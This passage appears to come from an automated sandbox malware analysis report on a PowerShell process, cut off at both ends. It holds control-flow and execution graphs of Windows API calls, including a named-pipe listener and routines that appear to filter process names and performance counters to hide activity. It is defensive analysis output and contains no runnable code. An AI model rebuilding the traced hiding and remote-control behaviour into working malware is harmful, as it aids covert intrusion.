1553->1557 1558 7ffb4b085903 1553->1558 1555->1541 1565 7ffb4b085776-7ffb4b085779 1555->1565 1556->1555 1559 7ffb4b085918-7ffb4b085932 1557->1559 1560 7ffb4b085917 1557->1560 1558->1557 1560->1559 1566 7ffb4b0857a0 1565->1566 1567 7ffb4b08577b-7ffb4b08579e 1565->1567 1571 7ffb4b0857a2-7ffb4b0857a4 1566->1571 1567->1571 1568->1547 1568->1550 1569->1553 1571->1541 1575 7ffb4b0857a6-7ffb4b0857b0 1571->1575 1578 7ffb4b0857b2-7ffb4b0857b9 1575->1578 1579 7ffb4b0857c0-7ffb4b0857c9 1578->1579 1580 7ffb4b0857e2-7ffb4b0857ef 1579->1580 1581 7ffb4b0857cb-7ffb4b0857d8 1579->1581 1581->1580 1583 7ffb4b0857da-7ffb4b0857e0 1581->1583 1583->1580
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1522152764.00007FFB4B080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B080000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4b080000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 08feb4fffb80fbab5967ae9f8e46b9a57bd6573eb6c7f46607e2a84f66a4fca9
                                                                                                                                  • Instruction ID: 0a4cfd4f0074a1cd64704a84ea144ae23ac26ca7ab332cc98e9f36d3e49e6e23
                                                                                                                                  • Opcode Fuzzy Hash: 08feb4fffb80fbab5967ae9f8e46b9a57bd6573eb6c7f46607e2a84f66a4fca9
                                                                                                                                  • Instruction Fuzzy Hash: A7427AA2A0DB894FEB96AB3C98156B57FD1EF56211B0841FBD48CC72A3DD08DD09C391
                                                                                                                                  Function 00007FFB4AEB2164 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1646 7ffb4aeb2164-7ffb4aeb2186 1649 7ffb4aeb2288-7ffb4aeb22d0 1646->1649 1650 7ffb4aeb218c-7ffb4aeb2196 1646->1650 1661 7ffb4aeb22f4-7ffb4aeb2314 1649->1661 1662 7ffb4aeb22d2-7ffb4aeb22f3 1649->1662 1651 7ffb4aeb2198-7ffb4aeb21a8 1650->1651 1652 7ffb4aeb21af-7ffb4aeb21ba 1650->1652 1659 7ffb4aeb21c5-7ffb4aeb21de 1651->1659 1660 7ffb4aeb21aa-7ffb4aeb21ad 1651->1660 1657 7ffb4aeb21bc-7ffb4aeb21be 1652->1657 1658 7ffb4aeb21bf-7ffb4aeb21c4 1652->1658 1657->1658 1658->1659 1659->1649 1665 7ffb4aeb21e4-7ffb4aeb21ee 1659->1665 1660->1652 1670 7ffb4aeb231a-7ffb4aeb238e 1661->1670 1671 7ffb4aeb23b1-7ffb4aeb23bb 1661->1671 1662->1661 1667 7ffb4aeb2207-7ffb4aeb2267 1665->1667 1668 7ffb4aeb21f0-7ffb4aeb21fd 1665->1668 1690 7ffb4aeb2269-7ffb4aeb2277 1667->1690 1691 7ffb4aeb227b-7ffb4aeb2287 1667->1691 1668->1667 1677 7ffb4aeb21ff-7ffb4aeb2205 1668->1677 1698 7ffb4aeb2396-7ffb4aeb23ae 1670->1698 1675 7ffb4aeb23c8-7ffb4aeb240a 1671->1675 1676 7ffb4aeb23bd-7ffb4aeb23c7 1671->1676 1677->1667 1690->1691 1698->1671
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518799582.00007FFB4AEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4aeb0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9a6ee3036e176689fd0a6cb1345e66a24a4d2d222d6ae9da3cf1e969ffe5933a
                                                                                                                                  • Instruction ID: 351484200d2c8ffa8038a3e766e6adc49e721b1d360b9661c2948cab3cdb9425
                                                                                                                                  • Opcode Fuzzy Hash: 9a6ee3036e176689fd0a6cb1345e66a24a4d2d222d6ae9da3cf1e969ffe5933a
                                                                                                                                  • Instruction Fuzzy Hash: 8581F1A294DBC61FE39AFE7C99592643BD5FF56210B2900FAD09CCB1E3D8295C09C352
                                                                                                                                  Function 00007FFB4B085670 Relevance: .2, Instructions: 185COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1522152764.00007FFB4B080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B080000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4b080000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b217bb87b39952c26eda8a300c035e514912e919f46d5a8426fa6d051162a299
                                                                                                                                  • Instruction ID: 9e2b332175e8cecc80838816f56afe210acacb1db36aaabe6dfa7aa78119b6ab
                                                                                                                                  • Opcode Fuzzy Hash: b217bb87b39952c26eda8a300c035e514912e919f46d5a8426fa6d051162a299
                                                                                                                                  • Instruction Fuzzy Hash: 9A5175A1A0DB8A4FEB96EE3898A46767BD0EF51211B49C0FBD54DCB2E3DD08DC058351

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:4.4%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                  Signature Coverage:6.9%
                                                                                                                                  Total number of Nodes:1708
                                                                                                                                  Total number of Limit Nodes:27
                                                                                                                                  execution_graph 9901 290edd040e0 9902 290edd0402d 9901->9902 9903 290edd0407d VirtualQuery 9902->9903 9904 290edd04097 9902->9904 9905 290edd040e2 GetLastError 9902->9905 9903->9902 9903->9904 9905->9902 7970 290edd0f460 7981 290edd0c318 EnterCriticalSection 7970->7981 7972 290edd0f470 7973 290edd11a1c 39 API calls 7972->7973 7974 290edd0f479 7973->7974 7975 290edd0f487 7974->7975 7976 290edd0f258 41 API calls 7974->7976 7977 290edd0c36c Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 7975->7977 7978 290edd0f482 7976->7978 7979 290edd0f493 7977->7979 7980 290edd0f358 GetStdHandle GetFileType 7978->7980 7980->7975 9097 290edd0f5e0 9100 290edd0f598 9097->9100 9105 290edd0c318 EnterCriticalSection 9100->9105 9106 290edd0fbe0 9107 290edd0fc0a 9106->9107 9108 290edd0cfe0 __std_exception_copy 13 API calls 9107->9108 9109 290edd0fc2a 9108->9109 9110 290edd0d060 __free_lconv_num 13 API calls 9109->9110 9111 290edd0fc38 9110->9111 9113 290edd0cfe0 __std_exception_copy 13 API calls 9111->9113 9114 290edd0fc62 9111->9114 9112 290edd0fc81 InitializeCriticalSectionEx 9112->9114 9115 290edd0fc54 9113->9115 9114->9112 9117 290edd0fc6b 9114->9117 9116 290edd0d060 __free_lconv_num 13 API calls 9115->9116 9116->9114 9118 290edd0c5e8 9119 290edd0c602 9118->9119 9120 290edd0c5ed 9118->9120 9124 290edd0c608 9120->9124 9125 290edd0c64a 9124->9125 9128 290edd0c652 9124->9128 9126 290edd0d060 __free_lconv_num 13 API calls 9125->9126 9126->9128 9127 290edd0d060 __free_lconv_num 13 API calls 9129 290edd0c65f 9127->9129 9128->9127 9130 290edd0d060 __free_lconv_num 13 API calls 9129->9130 9131 290edd0c66c 9130->9131 9132 290edd0d060 __free_lconv_num 13 API calls 9131->9132 9133 290edd0c679 9132->9133 9134 290edd0d060 __free_lconv_num 13 API calls 9133->9134 9135 290edd0c686 9134->9135 9136 290edd0d060 __free_lconv_num 13 API calls 9135->9136 9137 290edd0c693 9136->9137 9138 290edd0d060 __free_lconv_num 13 API calls 9137->9138 9139 290edd0c6a0 9138->9139 9140 290edd0d060 __free_lconv_num 13 API calls 9139->9140 9141 290edd0c6ad 9140->9141 9142 290edd0d060 __free_lconv_num 13 API calls 9141->9142 9143 290edd0c6bd 9142->9143 9144 290edd0d060 __free_lconv_num 13 API calls 9143->9144 9145 290edd0c6cd 9144->9145 9150 290edd0c4b8 9145->9150 9164 290edd0c318 EnterCriticalSection 9150->9164 9654 290edd10d68 9655 290edd10d8c 9654->9655 9656 290edd07e30 _invalid_parameter_noinfo 8 API calls 9655->9656 9657 290edd10dce 9656->9657 8154 290edd0a86c 8155 290edd0a899 __except_validate_context_record 8154->8155 8171 290edd090e4 8155->8171 8157 290edd0a89e 8158 290edd0a986 8157->8158 8159 290edd0a8f8 8157->8159 8169 290edd0a94c 8157->8169 8161 290edd0a9a5 8158->8161 8193 290edd0978c 8158->8193 8162 290edd0a973 8159->8162 8168 290edd0a91a __GetCurrentState 8159->8168 8159->8169 8167 290edd0a9f4 8161->8167 8161->8169 8196 290edd097a0 8161->8196 8186 290edd09390 8162->8186 8165 290edd0aa9d 8167->8169 8199 290edd09fec 8167->8199 8168->8165 8174 290edd0ad78 8168->8174 8256 290edd09100 8171->8256 8173 290edd090ed 8173->8157 8175 290edd0978c Is_bad_exception_allowed 9 API calls 8174->8175 8176 290edd0ada7 __GetCurrentState 8175->8176 8177 290edd090e4 _CreateFrameInfo 9 API calls 8176->8177 8183 290edd0adc4 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8177->8183 8178 290edd0aebb 8179 290edd090e4 _CreateFrameInfo 9 API calls 8178->8179 8180 290edd0aec0 8179->8180 8181 290edd090e4 _CreateFrameInfo 9 API calls 8180->8181 8182 290edd0aecb __FrameHandler3::GetHandlerSearchState 8180->8182 8181->8182 8182->8169 8183->8178 8183->8182 8184 290edd0978c 9 API calls Is_bad_exception_allowed 8183->8184 8281 290edd097b4 8183->8281 8184->8183 8284 290edd093f4 8186->8284 8188 290edd093af __FrameHandler3::FrameUnwindToEmptyState 8288 290edd09300 8188->8288 8191 290edd0ad78 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8192 290edd093e4 8191->8192 8192->8169 8194 290edd090e4 _CreateFrameInfo 9 API calls 8193->8194 8195 290edd09795 8194->8195 8195->8161 8197 290edd090e4 _CreateFrameInfo 9 API calls 8196->8197 8198 290edd097a9 8197->8198 8198->8167 8292 290edd0af04 8199->8292 8201 290edd0a4b4 8202 290edd0a405 8202->8201 8203 290edd0a403 8202->8203 8345 290edd0a4bc 8202->8345 8206 290edd090e4 _CreateFrameInfo 9 API calls 8203->8206 8204 290edd0a133 8204->8202 8240 290edd0a16b 8204->8240 8210 290edd0a447 8206->8210 8207 290edd0a335 8207->8203 8213 290edd0a352 8207->8213 8214 290edd0978c Is_bad_exception_allowed 9 API calls 8207->8214 8208 290edd090e4 _CreateFrameInfo 9 API calls 8211 290edd0a09a 8208->8211 8210->8201 8357 290edd07e30 8210->8357 8211->8210 8215 290edd090e4 _CreateFrameInfo 9 API calls 8211->8215 8213->8203 8219 290edd0a374 8213->8219 8338 290edd09364 8213->8338 8214->8213 8218 290edd0a0aa 8215->8218 8220 290edd090e4 _CreateFrameInfo 9 API calls 8218->8220 8219->8203 8221 290edd0a38a 8219->8221 8253 290edd0a497 8219->8253 8222 290edd0a0b3 8220->8222 8223 290edd0a395 8221->8223 8226 290edd0978c Is_bad_exception_allowed 9 API calls 8221->8226 8303 290edd097cc 8222->8303 8230 290edd0af9c 9 API calls 8223->8230 8224 290edd090e4 _CreateFrameInfo 9 API calls 8227 290edd0a49d 8224->8227 8226->8223 8229 290edd090e4 _CreateFrameInfo 9 API calls 8227->8229 8232 290edd0a4a6 8229->8232 8233 290edd0a3ab 8230->8233 8231 290edd097a0 9 API calls 8231->8240 8236 290edd0c0b4 14 API calls 8232->8236 8233->8203 8237 290edd093f4 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 8233->8237 8234 290edd090e4 _CreateFrameInfo 9 API calls 8235 290edd0a0f5 8234->8235 8235->8204 8239 290edd090e4 _CreateFrameInfo 9 API calls 8235->8239 8236->8201 8238 290edd0a3c5 8237->8238 8342 290edd095f8 RtlUnwindEx 8238->8342 8242 290edd0a101 8239->8242 8240->8207 8240->8231 8317 290edd0a72c 8240->8317 8331 290edd09f18 8240->8331 8243 290edd090e4 _CreateFrameInfo 9 API calls 8242->8243 8245 290edd0a10a 8243->8245 8306 290edd0af9c 8245->8306 8249 290edd0a11e 8313 290edd0b08c 8249->8313 8251 290edd0a491 8371 290edd0c0b4 8251->8371 8253->8224 8254 290edd0a126 __CxxCallCatchBlock std::bad_alloc::bad_alloc 8254->8251 8366 290edd08f38 8254->8366 8257 290edd09118 8256->8257 8258 290edd0911f GetLastError 8256->8258 8257->8173 8268 290edd09a4c 8258->8268 8272 290edd0986c 8268->8272 8273 290edd098b0 __vcrt_FlsAlloc 8272->8273 8279 290edd09956 TlsGetValue 8272->8279 8274 290edd098de LoadLibraryExW 8273->8274 8277 290edd0999d GetProcAddress 8273->8277 8273->8279 8280 290edd09921 LoadLibraryExW 8273->8280 8275 290edd0997d 8274->8275 8276 290edd098ff GetLastError 8274->8276 8275->8277 8278 290edd09994 FreeLibrary 8275->8278 8276->8273 8277->8279 8278->8277 8280->8273 8280->8275 8282 290edd090e4 _CreateFrameInfo 9 API calls 8281->8282 8283 290edd097c2 8282->8283 8283->8183 8287 290edd09422 __FrameHandler3::FrameUnwindToEmptyState 8284->8287 8285 290edd09494 8285->8188 8286 290edd0944c RtlLookupFunctionEntry 8286->8287 8287->8285 8287->8286 8289 290edd09320 8288->8289 8290 290edd0934b 8288->8290 8289->8290 8291 290edd090e4 _CreateFrameInfo 9 API calls 8289->8291 8290->8191 8291->8289 8293 290edd0af29 __FrameHandler3::FrameUnwindToEmptyState 8292->8293 8294 290edd093f4 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 8293->8294 8295 290edd0af3e 8294->8295 8374 290edd09b74 8295->8374 8298 290edd0af50 __FrameHandler3::GetHandlerSearchState 8377 290edd09bac 8298->8377 8299 290edd0af73 8300 290edd09b74 __GetUnwindTryBlock RtlLookupFunctionEntry 8299->8300 8301 290edd0a04e 8300->8301 8301->8201 8301->8204 8301->8208 8304 290edd090e4 _CreateFrameInfo 9 API calls 8303->8304 8305 290edd097da 8304->8305 8305->8201 8305->8234 8307 290edd0b083 8306->8307 8309 290edd0afc7 8306->8309 8308 290edd0a11a 8308->8204 8308->8249 8309->8308 8310 290edd097a0 9 API calls 8309->8310 8311 290edd0978c Is_bad_exception_allowed 9 API calls 8309->8311 8312 290edd0a72c 9 API calls 8309->8312 8310->8309 8311->8309 8312->8309 8315 290edd0b0a9 Is_bad_exception_allowed 8313->8315 8316 290edd0b0f9 8313->8316 8314 290edd0978c 9 API calls Is_bad_exception_allowed 8314->8315 8315->8314 8315->8316 8316->8254 8318 290edd0a759 8317->8318 8329 290edd0a7e8 8317->8329 8319 290edd0978c Is_bad_exception_allowed 9 API calls 8318->8319 8320 290edd0a762 8319->8320 8321 290edd0978c Is_bad_exception_allowed 9 API calls 8320->8321 8322 290edd0a77b 8320->8322 8320->8329 8321->8322 8323 290edd0a7a7 8322->8323 8324 290edd0978c Is_bad_exception_allowed 9 API calls 8322->8324 8322->8329 8325 290edd097a0 9 API calls 8323->8325 8324->8323 8326 290edd0a7bb 8325->8326 8327 290edd0a7d4 8326->8327 8328 290edd0978c Is_bad_exception_allowed 9 API calls 8326->8328 8326->8329 8330 290edd097a0 9 API calls 8327->8330 8328->8327 8329->8240 8330->8329 8332 290edd093f4 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 8331->8332 8333 290edd09f55 8332->8333 8334 290edd0978c Is_bad_exception_allowed 9 API calls 8333->8334 8335 290edd09f8d 8334->8335 8336 290edd095f8 9 API calls 8335->8336 8337 290edd09fd1 8336->8337 8337->8240 8339 290edd09378 __FrameHandler3::FrameUnwindToEmptyState 8338->8339 8340 290edd09300 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8339->8340 8341 290edd09382 8340->8341 8341->8219 8343 290edd07e30 _invalid_parameter_noinfo 8 API calls 8342->8343 8344 290edd096f2 8343->8344 8344->8203 8346 290edd0a4f5 8345->8346 8347 290edd0a708 8345->8347 8348 290edd090e4 _CreateFrameInfo 9 API calls 8346->8348 8347->8203 8349 290edd0a4fa 8348->8349 8350 290edd0a519 EncodePointer 8349->8350 8356 290edd0a56c 8349->8356 8351 290edd090e4 _CreateFrameInfo 9 API calls 8350->8351 8352 290edd0a529 8351->8352 8352->8356 8380 290edd092ac 8352->8380 8354 290edd0978c 9 API calls Is_bad_exception_allowed 8354->8356 8355 290edd09f18 19 API calls 8355->8356 8356->8347 8356->8354 8356->8355 8358 290edd07e39 8357->8358 8359 290edd08608 IsProcessorFeaturePresent 8358->8359 8360 290edd07e44 8358->8360 8361 290edd08620 8359->8361 8360->8169 8383 290edd086dc RtlCaptureContext 8361->8383 8367 290edd08f57 8366->8367 8368 290edd08f80 RtlPcToFileHeader 8367->8368 8369 290edd08fa2 RaiseException 8367->8369 8370 290edd08f98 8368->8370 8369->8251 8370->8369 8388 290edd0c870 8371->8388 8373 290edd0c0bd 8375 290edd093f4 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 8374->8375 8376 290edd09b87 8375->8376 8376->8298 8376->8299 8378 290edd093f4 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 8377->8378 8379 290edd09bc6 8378->8379 8379->8301 8381 290edd090e4 _CreateFrameInfo 9 API calls 8380->8381 8382 290edd092d8 8381->8382 8382->8356 8384 290edd086f6 RtlLookupFunctionEntry 8383->8384 8385 290edd08633 8384->8385 8386 290edd0870c RtlVirtualUnwind 8384->8386 8387 290edd085d4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8385->8387 8386->8384 8386->8385 8396 290edd0c8d0 8388->8396 8390 290edd0c87e 8390->8373 8391 290edd0c879 8391->8390 8392 290edd0c8a8 FlsGetValue 8391->8392 8394 290edd0c8a4 8391->8394 8392->8394 8393 290edd0c8be 8393->8373 8394->8393 8405 290edd0c700 GetLastError 8394->8405 8397 290edd0c919 GetLastError 8396->8397 8401 290edd0c8ef __std_exception_copy 8396->8401 8398 290edd0c92c 8397->8398 8400 290edd0c94a SetLastError 8398->8400 8402 290edd0c947 8398->8402 8404 290edd0c700 __std_exception_copy 11 API calls 8398->8404 8399 290edd0c914 8399->8391 8400->8399 8401->8399 8403 290edd0c700 __std_exception_copy 11 API calls 8401->8403 8402->8400 8403->8399 8404->8402 8406 290edd0c726 8405->8406 8407 290edd0c72c SetLastError 8406->8407 8423 290edd0cfe0 8406->8423 8408 290edd0c7a5 8407->8408 8408->8393 8411 290edd0c765 FlsSetValue 8414 290edd0c771 FlsSetValue 8411->8414 8415 290edd0c788 8411->8415 8412 290edd0c755 FlsSetValue 8430 290edd0d060 8412->8430 8417 290edd0d060 __free_lconv_num 7 API calls 8414->8417 8436 290edd0c518 8415->8436 8419 290edd0c786 SetLastError 8417->8419 8419->8408 8428 290edd0cff1 __std_exception_copy 8423->8428 8424 290edd0d042 8444 290edd0cfb4 8424->8444 8425 290edd0d026 HeapAlloc 8426 290edd0c747 8425->8426 8425->8428 8426->8411 8426->8412 8428->8424 8428->8425 8441 290edd0b230 8428->8441 8431 290edd0d065 HeapFree 8430->8431 8432 290edd0c763 8430->8432 8431->8432 8433 290edd0d080 GetLastError 8431->8433 8432->8407 8434 290edd0d08d __free_lconv_num 8433->8434 8435 290edd0cfb4 __std_exception_copy 11 API calls 8434->8435 8435->8432 8453 290edd0c3f0 8436->8453 8447 290edd0b280 8441->8447 8445 290edd0c8d0 __std_exception_copy 13 API calls 8444->8445 8446 290edd0cfbd 8445->8446 8446->8426 8452 290edd0c318 EnterCriticalSection 8447->8452 8465 290edd0c318 EnterCriticalSection 8453->8465 9166 290edd02dd0 9168 290edd02e41 9166->9168 9167 290edd03154 9168->9167 9169 290edd02e6d GetModuleHandleA 9168->9169 9170 290edd02e91 9169->9170 9171 290edd02e7f GetProcAddress 9169->9171 9170->9167 9172 290edd02eb8 StrCmpNIW 9170->9172 9171->9170 9172->9167 9176 290edd02edd 9172->9176 9173 290edd01a30 6 API calls 9173->9176 9174 290edd02fef lstrlenW 9174->9176 9175 290edd03099 lstrlenW 9175->9176 9176->9167 9176->9173 9176->9174 9176->9175 9177 290edd03d4c StrCmpNIW 9176->9177 9178 290edd01cf8 StrCmpIW StrCmpW 9176->9178 9177->9176 9178->9176 9179 290edd143d1 __scrt_dllmain_exception_filter 9909 290edd0c2d0 9910 290edd0c2d8 9909->9910 9912 290edd0c305 9910->9912 9913 290edd0c334 9910->9913 9914 290edd0c35f 9913->9914 9915 290edd0c363 9914->9915 9916 290edd0c342 DeleteCriticalSection 9914->9916 9915->9912 9916->9914 9180 290edd027d4 9181 290edd02853 9180->9181 9182 290edd028b5 GetFileType 9181->9182 9194 290edd02984 9181->9194 9183 290edd028c3 StrCpyW 9182->9183 9184 290edd028d9 9182->9184 9185 290edd028e8 9183->9185 9196 290edd01ad0 GetFinalPathNameByHandleW 9184->9196 9188 290edd028f2 9185->9188 9190 290edd02989 9185->9190 9187 290edd03d4c StrCmpNIW 9187->9190 9189 290edd03d4c StrCmpNIW 9188->9189 9188->9194 9201 290edd034d8 StrCmpIW 9188->9201 9205 290edd01dd0 9188->9205 9189->9188 9190->9187 9191 290edd034d8 4 API calls 9190->9191 9192 290edd01dd0 2 API calls 9190->9192 9190->9194 9191->9190 9192->9190 9197 290edd01b39 9196->9197 9198 290edd01afa StrCmpNIW 9196->9198 9197->9185 9198->9197 9199 290edd01b14 lstrlenW 9198->9199 9199->9197 9200 290edd01b26 StrCpyW 9199->9200 9200->9197 9202 290edd03521 PathCombineW 9201->9202 9203 290edd0350a StrCpyW StrCatW 9201->9203 9204 290edd0352a 9202->9204 9203->9204 9204->9188 9206 290edd01de7 9205->9206 9207 290edd01df0 9205->9207 9208 290edd01530 2 API calls 9206->9208 9207->9188 9208->9207 9209 290edd0bfd8 9210 290edd0d060 __free_lconv_num 13 API calls 9209->9210 9211 290edd0bfe8 9210->9211 9212 290edd0d060 __free_lconv_num 13 API calls 9211->9212 9213 290edd0bffc 9212->9213 9214 290edd0d060 __free_lconv_num 13 API calls 9213->9214 9215 290edd0c010 9214->9215 9216 290edd0d060 __free_lconv_num 13 API calls 9215->9216 9217 290edd0c024 9216->9217 9662 290edd1455d 9665 290edd0acf4 9662->9665 9666 290edd0ad5b 9665->9666 9667 290edd0ad0e 9665->9667 9667->9666 9668 290edd090e4 _CreateFrameInfo 9 API calls 9667->9668 9668->9666 9669 290edd07f80 9670 290edd07f89 __scrt_acquire_startup_lock 9669->9670 9672 290edd07f8d 9670->9672 9673 290edd0b974 9670->9673 9674 290edd0b994 9673->9674 9675 290edd0b9ad 9673->9675 9676 290edd0b9b2 9674->9676 9677 290edd0b99c 9674->9677 9675->9672 9679 290edd0e624 56 API calls 9676->9679 9678 290edd0cfb4 __std_exception_copy 13 API calls 9677->9678 9680 290edd0b9a1 9678->9680 9681 290edd0b9b7 9679->9681 9682 290edd0ce0c _invalid_parameter_noinfo 38 API calls 9680->9682 9702 290edd0dcf8 GetModuleFileNameW 9681->9702 9682->9675 9687 290edd0b914 13 API calls 9688 290edd0ba21 9687->9688 9689 290edd0ba29 9688->9689 9690 290edd0ba3a 9688->9690 9691 290edd0cfb4 __std_exception_copy 13 API calls 9689->9691 9692 290edd0b754 14 API calls 9690->9692 9701 290edd0ba2e 9691->9701 9693 290edd0ba56 9692->9693 9695 290edd0ba86 9693->9695 9696 290edd0ba9f 9693->9696 9693->9701 9694 290edd0d060 __free_lconv_num 13 API calls 9694->9675 9697 290edd0d060 __free_lconv_num 13 API calls 9695->9697 9699 290edd0d060 __free_lconv_num 13 API calls 9696->9699 9698 290edd0ba8f 9697->9698 9700 290edd0d060 __free_lconv_num 13 API calls 9698->9700 9699->9701 9700->9675 9701->9694 9703 290edd0dd51 9702->9703 9704 290edd0dd3d GetLastError 9702->9704 9706 290edd0db38 14 API calls 9703->9706 9720 290edd0cf44 9704->9720 9707 290edd0dd7f 9706->9707 9709 290edd0ef58 9 API calls 9707->9709 9711 290edd0dd90 9707->9711 9708 290edd07e30 _invalid_parameter_noinfo 8 API calls 9710 290edd0b9ce 9708->9710 9709->9711 9714 290edd0b754 9710->9714 9725 290edd0dbdc 9711->9725 9713 290edd0dd4a 9713->9708 9716 290edd0b792 9714->9716 9718 290edd0b7f8 9716->9718 9742 290edd0e9dc 9716->9742 9717 290edd0b8e5 9717->9687 9718->9717 9719 290edd0e9dc 14 API calls 9718->9719 9719->9718 9739 290edd0cf90 9720->9739 9722 290edd0cf51 __free_lconv_num 9723 290edd0cfb4 __std_exception_copy 13 API calls 9722->9723 9724 290edd0cf61 9723->9724 9724->9713 9726 290edd0dc1b 9725->9726 9731 290edd0dc00 9725->9731 9727 290edd0eaa8 WideCharToMultiByte 9726->9727 9734 290edd0dc20 9726->9734 9728 290edd0dc77 9727->9728 9729 290edd0dc7e GetLastError 9728->9729 9733 290edd0dca9 9728->9733 9728->9734 9732 290edd0cf44 13 API calls 9729->9732 9730 290edd0cfb4 __std_exception_copy 13 API calls 9730->9731 9731->9713 9735 290edd0dc8b 9732->9735 9736 290edd0eaa8 WideCharToMultiByte 9733->9736 9734->9730 9734->9731 9737 290edd0cfb4 __std_exception_copy 13 API calls 9735->9737 9738 290edd0dcd0 9736->9738 9737->9731 9738->9729 9738->9731 9740 290edd0c8d0 __std_exception_copy 13 API calls 9739->9740 9741 290edd0cf99 9740->9741 9741->9722 9743 290edd0e968 9742->9743 9744 290edd0db38 14 API calls 9743->9744 9745 290edd0e98c 9744->9745 9745->9716 9218 290edd0f200 GetProcessHeap 9917 290edd0fd00 9918 290edd0fd0b 9917->9918 9926 290edd129e4 9918->9926 9939 290edd0c318 EnterCriticalSection 9926->9939 9219 290edd0ac02 9220 290edd090e4 _CreateFrameInfo 9 API calls 9219->9220 9223 290edd0ac0f __CxxCallCatchBlock 9220->9223 9221 290edd0ac53 RaiseException 9222 290edd0ac7a 9221->9222 9232 290edd09738 9222->9232 9223->9221 9225 290edd0acab __CxxCallCatchBlock 9226 290edd090e4 _CreateFrameInfo 9 API calls 9225->9226 9227 290edd0acbe 9226->9227 9228 290edd090e4 _CreateFrameInfo 9 API calls 9227->9228 9230 290edd0acc7 9228->9230 9233 290edd090e4 _CreateFrameInfo 9 API calls 9232->9233 9234 290edd0974a 9233->9234 9235 290edd09785 9234->9235 9236 290edd090e4 _CreateFrameInfo 9 API calls 9234->9236 9237 290edd09755 9236->9237 9237->9235 9238 290edd090e4 _CreateFrameInfo 9 API calls 9237->9238 9239 290edd09776 9238->9239 9239->9225 9240 290edd08db8 9239->9240 9241 290edd090e4 _CreateFrameInfo 9 API calls 9240->9241 9242 290edd08dc6 9241->9242 9242->9225 8040 140003784 8041 140003791 8040->8041 8043 1400037b1 ConnectNamedPipe 8041->8043 8044 1400037a6 Sleep 8041->8044 8051 140002390 AllocateAndInitializeSid 8041->8051 8045 14000380f Sleep 8043->8045 8046 1400037c0 ReadFile 8043->8046 8044->8041 8048 14000381a DisconnectNamedPipe 8045->8048 8047 1400037e3 8046->8047 8046->8048 8050 140003220 31 API calls 8047->8050 8048->8043 8049 1400037e9 WriteFile 8049->8048 8050->8049 8052 1400024ab 8051->8052 8053 1400023ed SetEntriesInAclW 8051->8053 8052->8041 8053->8052 8054 140002431 LocalAlloc 8053->8054 8054->8052 8055 140002445 InitializeSecurityDescriptor 8054->8055 8055->8052 8056 140002455 SetSecurityDescriptorDacl 8055->8056 8056->8052 8057 14000246c CreateNamedPipeW 8056->8057 8057->8052 9746 290edd14582 9747 290edd09738 __CxxCallCatchBlock 9 API calls 9746->9747 9751 290edd14595 9747->9751 9748 290edd145d4 __CxxCallCatchBlock 9749 290edd090e4 _CreateFrameInfo 9 API calls 9748->9749 9750 290edd145e8 9749->9750 9752 290edd090e4 _CreateFrameInfo 9 API calls 9750->9752 9751->9748 9754 290edd08db8 __CxxCallCatchBlock 9 API calls 9751->9754 9753 290edd145f8 9752->9753 9754->9748 8467 290edd03288 8468 290edd032b8 8467->8468 8469 290edd03371 8468->8469 8470 290edd032d5 PdhGetCounterInfoW 8468->8470 8470->8469 8471 290edd032f3 GetProcessHeap HeapAlloc PdhGetCounterInfoW 8470->8471 8472 290edd03325 StrCmpW 8471->8472 8473 290edd0335d GetProcessHeap HeapFree 8471->8473 8472->8473 8475 290edd0333a 8472->8475 8473->8469 8475->8473 8476 290edd03720 StrCmpNW 8475->8476 8477 290edd03752 StrStrW 8476->8477 8480 290edd037c2 8476->8480 8478 290edd0376b StrToIntW 8477->8478 8477->8480 8479 290edd03793 8478->8479 8478->8480 8479->8480 8486 290edd01a30 OpenProcess 8479->8486 8480->8475 8487 290edd01ab4 8486->8487 8488 290edd01a64 K32GetProcessImageFileNameW 8486->8488 8487->8480 8492 290edd03d4c 8487->8492 8489 290edd01aab CloseHandle 8488->8489 8490 290edd01a7c PathFindFileNameW lstrlenW 8488->8490 8489->8487 8490->8489 8491 290edd01a9a StrCpyW 8490->8491 8491->8489 8493 290edd03d59 StrCmpNIW 8492->8493 8494 290edd037b4 8492->8494 8493->8494 8494->8480 8495 290edd01cf8 8494->8495 8496 290edd01d0f 8495->8496 8498 290edd01d18 8495->8498 8499 290edd01530 8496->8499 8498->8480 8500 290edd01580 8499->8500 8501 